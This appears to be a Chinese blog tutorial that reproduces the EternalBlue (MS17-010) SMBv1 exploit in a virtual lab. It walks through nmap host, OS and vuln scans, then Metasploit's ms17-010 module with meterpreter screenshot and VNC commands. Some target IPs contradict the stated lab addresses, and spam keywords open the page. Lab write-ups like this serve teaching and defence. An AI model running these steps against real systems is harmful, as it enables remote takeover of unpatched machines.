安徽省级建设主管部门网站,东莞网站制作十强,wordpress修改用户资料,常州网站制作包括哪些1.概述
永恒之蓝#xff08;EternalBlue#xff09;是一个影响Windows操作系统的远程代码执行漏洞#xff0c;编号为CVE-2017-0144#xff0c;最初由美国国家安全局#xff08;NSA#xff09;开发并利用#xff0c;后来被黑客组织Shadow Brokers泄露。该漏洞存在于SMBv…1.概述
永恒之蓝EternalBlue是一个影响Windows操作系统的远程代码执行漏洞编号为CVE-2017-0144最初由美国国家安全局NSA开发并利用后来被黑客组织Shadow Brokers泄露。该漏洞存在于SMBv1协议的内存处理过程中攻击者可通过发送特制的恶意数据包远程执行任意代码控制目标系统。它最臭名昭著的应用是2017年的WannaCry勒索软件攻击该攻击迅速传播影响超过230,000台计算机导致全球范围内的广泛破坏。微软在2017年3月发布了安全更新补丁MS17-010修复该漏洞但由于部分系统未及时更新仍有大量机器暴露在风险之中。为防范此类攻击建议关闭SMBv1协议并及时应用补丁。本文在虚拟环境中使用Nmap和Metasploit对病毒攻击进行复现展示其攻击过程供大家学习和参考。 如果当前的Windows系统启用了SMBv1协议并且没有安装微软发布的补丁MS17-010那么该系统确实暴露在永恒之蓝EternalBlue漏洞的威胁之下。 2. 复现准备
2.1 漏洞原理
永恒之蓝的漏洞存在于SMBv1协议的实现中。当一个Windows系统通过SMBv1接收到经过特制的恶意请求时协议处理过程中的缓冲区管理出现错误导致内存中的数据被非法操作。这种内存管理漏洞属于缓冲区溢出Buffer Overflow类型使得攻击者可以向目标系统注入并执行任意代码最终完全控制受害者系统。其详细过程如下
缓冲区溢出攻击者向目标系统的SMBv1服务发送一个特制的请求数据包该数据包利用了SMB协议在处理网络请求时的内存管理缺陷。在处理这些数据时系统没有正确验证输入的大小导致了缓冲区溢出问题。内存损坏缓冲区溢出会使得攻击者能够覆盖系统内存中的数据尤其是代码执行区域的内存。通过精心构造的攻击数据包攻击者能够覆盖特定的内存区域使得系统执行恶意代码。远程代码执行攻击者可以在目标系统上植入恶意代码并远程执行。因为SMB服务通常运行在系统权限下攻击者获得的执行权限往往是管理员权限这意味着攻击者可以完全控制受害系统。 缓冲区溢出Buffer Overflow是一种常见的计算机安全漏洞发生在程序试图将超过预定大小的数据写入缓冲区时。缓冲区是程序在内存中用于临时存储数据的区域当数据超出该区域容量时多余的数据会覆盖相邻的内存地址可能导致程序崩溃或给攻击者提供执行任意代码的机会。 2.2 漏洞影响
永恒之蓝漏洞影响了多个Windows版本其中Windows 7和Windows Server 2008受到的影响最为严重许多未打补丁的系统成为攻击目标。Windows Vista和Windows XP也存在风险前者在2017年结束支持后者在2014年已不再获得安全更新使用这些版本的系统极为脆弱。Windows Server 2012虽然受到影响但通常会及时进行安全更新而Windows 10在漏洞首次出现时也受影响但迅速推出了补丁风险相对较低。Windows Server 2016和2019虽受影响但仍在持续支持中建议用户定期更新以降低安全风险。
Windows版本影响程度支持状态Windows 7受影响严重许多未打补丁的系统成为攻击目标2020年1月结束支持某些企业仍在使用Windows Server 2008同样受到影响广泛应用于企业和数据中心环境2020年1月结束主流支持转入扩展支持Windows Vista受到影响但用户数量较少2017年4月结束支持Windows XP历史悠久的系统易受到攻击特别是在特定设备上2014年结束支持使用该版本的系统风险极高Windows Server 2012受影响但通常会较快进行安全更新仍在进行主流支持未打补丁的系统存在风险Windows 10受影响但快速发布了补丁相对风险较低持续获得更新和支持建议定期安装安全补丁Windows Server 2016受影响但及时获得安全补丁仍在持续支持中建议定期更新Windows Server 2019受影响但及时获得安全补丁仍在持续支持中建议定期更新
2.3 复现环境
虚拟环境搭建VMware Workstation 17 Pro
网络模式NAT是一种在网络设备如路由器或防火墙中使用的技术用于将私有IP地址转换为公共IP地址。通过NAT多个虚拟机可以共享宿主机的公共IP地址以访问外部网络。 当虚拟机发送网络请求时宿主机会捕获这些请求并将虚拟机的私有IP地址转换为宿主机的公共IP地址然后将请求发送到外部网络。当外部网络返回数据时宿主机会使用NAT表将数据包路由回相应的虚拟机每个虚拟机的流量通过不同的端口进行标识从而确保数据包能够正确发送到目标虚拟机。 攻击机kali Linux 2019.1IP192.168.153.130。
靶机Windows 7IP192.168.153.129。
3. 攻击复现
3.1 使用nmap进行扫描
使用nmap扫描当前网段中存活的主机
# 活跃机器扫描
nmap -sS 192.168.153.0/24扫描发现与攻击机处于同一网段的靶机其IP为192.168.153.129其开放的端口包括135端口、139端口基于445端口。在此基础上需要进一步确认靶机的操作系统类型。
# 操作系统侦察
nmap -O 192.168.56.129扫描发现靶机的操作系统为Windows 7在此基础上进一步通过nmap脚本扫描靶机中存在的漏洞。
# 漏洞扫描
nmap --scriptvuln 192.168.56.132扫描发现靶机存在永恒之蓝漏洞ms17-010接下来需要使用工具实现漏洞的利用。
3.2 使用Metasploit进行攻击
启动Metasploit并搜索永恒之蓝漏洞相关的工具。
# 启动metasploit
msfconsole# 搜索永恒之蓝相关工具
search ms17-010 执行上述指令后发现存在一系列用于永恒之蓝漏洞利用的模块如上图所示。其中我们利用模块2。
# 选择模块2
use 2# 显示配置
show option# 设置靶机IP
set RHOSTS 192.168.153.129# 运行模块
run运行成功后会出现 meterpreter 提示符它是 Metasploit 的一个强大扩展模块。通过 Meterpreter可以执行更深入的渗透操作例如获取目标系统的屏幕截图、上传或下载文件、创建持久后门等。基于meterpreter模块我们首先可以实现靶机的截屏如下图所示。
# 靶机截屏指令
screenshot# 远程桌面指令
run vnc
